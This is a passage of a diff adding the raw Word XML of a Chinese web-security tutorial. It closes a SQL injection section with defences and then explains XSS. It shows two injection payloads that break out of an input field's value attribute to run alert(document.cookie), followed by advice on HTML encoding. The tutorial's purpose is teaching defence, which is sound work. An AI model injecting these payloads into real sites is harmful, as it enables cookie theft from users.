+                      <a:ext cx="5274310" cy="2239645"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>现在证明了该表名是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>jobs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>，这可以迈向成功的一大步，由于我们知道了表名就可以对该表进行增删改操作了，而且我们还可以猜测出更多的表对它们作出修改，一旦修改成功那么这将是一场灾难。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>现在大家已经对</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>SQL Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>的攻击有了初步的了解了，接下让我们学习如何防止</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>SQL Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>总的来说有以下几点：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>永远不要信任用户的输入，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>要对用户的输入进行校验</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>，可以通过正则表达式，或限制长度，对单引号和双</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>"-"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>进行转换等。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>永远不要使用动态拼装</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>，可以</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>使用参数化的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>或者直接</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>使用存储过程</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>进行数据查询存取。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>永远不要使用管理员权限的数据库连接，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>为每个应用使用单独的权限</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>有限的数据库连接。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>参考资料：</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId50" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+            <w:kern w:val="0"/>
+          </w:rPr>
+          <w:t>利用</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+            <w:kern w:val="0"/>
+          </w:rPr>
+          <w:t>SQL</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:eastAsia="宋体" w:cs="宋体"/>
+            <w:kern w:val="0"/>
+          </w:rPr>
+          <w:t>注入漏洞登录后台</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>全称</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(Cross Site Scripting) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>跨站脚本攻击，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>例如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">JavaScript), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>比如获取用户的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，导航到恶意网站</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>携带木马等。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>假如有下面一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>textbox</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>&lt;input type="text" name="address1" value="value1from"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>value1fro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>是来自用户的输入，如果用户不是输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>value1from,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>而是输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>"/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>那么就会变成</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>&lt;input type="text" name="address1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>value="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>"/&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>嵌入的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>代码将会被执行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>或者用户输入的是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>"onfocus="alert(document.cookie)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>那么就会变成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>&lt;input type="text" name="address1" value="</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>" onfocus="alert(document.cookie)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>之所以会发生，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>是因为用户输入的数据变成了代码。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>所以我们需要对用户输入的数据进行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTML Encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>处理。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>将其中的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>中括号</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>单引号</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>引号</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>之类的特殊字符进行编码。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>C#</w:t>
